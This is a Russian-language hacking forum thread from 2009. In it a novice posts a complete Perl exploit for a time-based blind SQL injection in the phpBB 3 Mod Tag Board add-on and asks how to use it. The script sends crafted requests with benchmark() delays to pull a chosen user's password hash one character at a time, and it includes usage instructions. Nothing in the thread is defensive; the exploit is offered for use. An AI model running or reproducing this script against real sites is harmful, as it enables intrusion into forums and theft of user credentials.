ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

phpBB 3 эксплоит
  #1  
Старый 11.10.2009, 12:18
Аватар для IiIjayIiI
IiIjayIiI
Новичок
Регистрация: 10.09.2009
Сообщений: 3
Провел на форуме:
13807

Репутация: 0
По умолчанию phpBB 3 эксплоит

вот есть эксплоит...


phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit

#!/usr/bin/perl
# ---------------------------------------------------------------
# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
# by athos - staker[at]hotmail[dot]it
# http://bx67212.netsons.org/forum/viewforum.php?f=3
# ---------------------------------------------------------------
# Note: Works regardless PHP.ini settings!
# Thanks meh also know as cHoBi
# ---------------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($hash,$time1,$time2);

my @chars = (48..57, 97..102);
my $http = new LWP::UserAgent;

my $host = shift;
my $table = shift;
my $myid = shift or &usage;


sub injection
{
my ($sub,$char) = @_;

return "/tag_board.php?mode=controlpanel&action=delete&id=" .
"1+and+(select+if((ascii(substring(user_password,$ {sub},1)".
")=${char}),benchmark(230000000,char(0)),0)+from+$ {table}_us".
"ers+where+user_id=${myid})--";
}


sub usage
{
print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n";
print STDOUT "by athos - staker[at]hotmail[dot]it\n";
exit;
}


syswrite(STDOUT,'Hash MD5: ');

for my $i(1..33)
{
for my $j(0..16)
{
$time1 = time();

$http->get($host.injection($i,$chars[$j]));

$time2 = time();

if($time2 - $time1 > 6)
{
syswrite(STDOUT,chr($chars[$j]));
$hash .= chr($chars[$j]);
last;
}

if($i == 1 && length $hash < 0)
{
syswrite(STDOUT,"Exploit Failed!\n");
exit;
}
}
}

# milw0rm.com [2008-12-08]


объясните пожалуйста как им воспользоватся...
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как юзать php эксплоит phpBB 2.0.6 RABBITSV Сценарии/CMF/СMS 1 21.09.2009 21:01
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Форумы 21 13.01.2007 23:01
Подборка уязвимостей phpBB -=ka$at1k=- Форумы 3 02.07.2006 15:26
Эксплоит для phpbb 2.0.15 KLez Форумы 56 01.07.2006 18:36
Есть ли эксплоит (не брут) к phpbb 2.0.19 ? sergio_nikol Форумы 4 02.02.2006 19:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ